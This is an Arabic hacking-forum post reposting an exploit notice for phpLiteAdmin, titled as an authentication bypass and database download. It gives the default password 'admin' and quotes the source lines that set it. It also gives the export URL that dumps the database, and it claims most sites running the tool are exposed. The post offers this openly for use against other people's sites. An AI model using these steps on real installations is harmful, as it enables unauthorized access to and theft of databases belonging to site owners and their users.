حالة الموضوع:
مغلق
  1. Ubuntu

    Ubuntu Developer

    الأنتساب:
    ‏6 يناير 2013
    المشاركات:
    62
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    8
    بسم الله الرحمن الرحيم

    السلام عليكم ورحمة الله تعالى وبركاته


    لما تدخل على واجهة الموقع الباسورد هو :admin
    لتحميل قاعدة البيانات:127.0.0.1/phpliteadmin.php?view=export
    و اضغط على export

    كود PHP:
    X-------------------------------------------------------------X
     _____ _   _ _   _ _____ _____ _____  ___   _   _   _______   _______ ___________ 
    |_   _| | | | \ | |_   _/  ___|_   _|/ \ | \ | | /  __ \ \ / / ___ \  ______ \
      | | | | | |  \| | | | \ `
    --.  | | / /_\ \|  \| | | /  \/\ V /| |_/ / |__ | |_/ /
      | | | | | | . 
    ` | | |  `--. \ | | |  _  || . ` | | |     \ / | ___ \  __||    / 
      | | | |
    _| | |\  |_| |_/\__/ /_| |_| | | || |\  | | \__/\ | | | |_/ / |___| |\ \ 
      \
    _/  \___/\_| \_/\___/\____/ \___/\_| |_/\_| \_/  \____/ \_/ \____/\____/\_| \_|
    X-------------------------------------------------------------X                                                                                  
     
     
    ***91;+***93AuthorTUNISIAN CYBER
    ***91;+***93Exploit TitlephpLiteAdmin v1.X.X Auth Bypass/Download DB vulnerabilities
    ***91;+***93Date8-12-2013
    ***91;+***93CategoryWebApp
    ***91;+***93Google Dorkn/a
    ***91;+***93Tested onWin7 ubuntu 13.04
     
     
    ########################################################################################

    1Auth Bypass:
    127.0.0.1/phpliteadmin.php

    username
    admin

    Source Code 
    (lines 35--->36) (v1.6)

    //password to gain access (change this to something more secure than 'admin')
    $password "admin";

    Source Code (lines 47--->48) (1.9.4.1)
    //password to gain access
    $password 'admin';

    2/Download DB:
    127.0.0.1/phpliteadmin.php?view=export
    Go To 
    "Save As" then click "Export"

    Sites that could be infected85/100

    ./3nD
    ########################################################################################
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة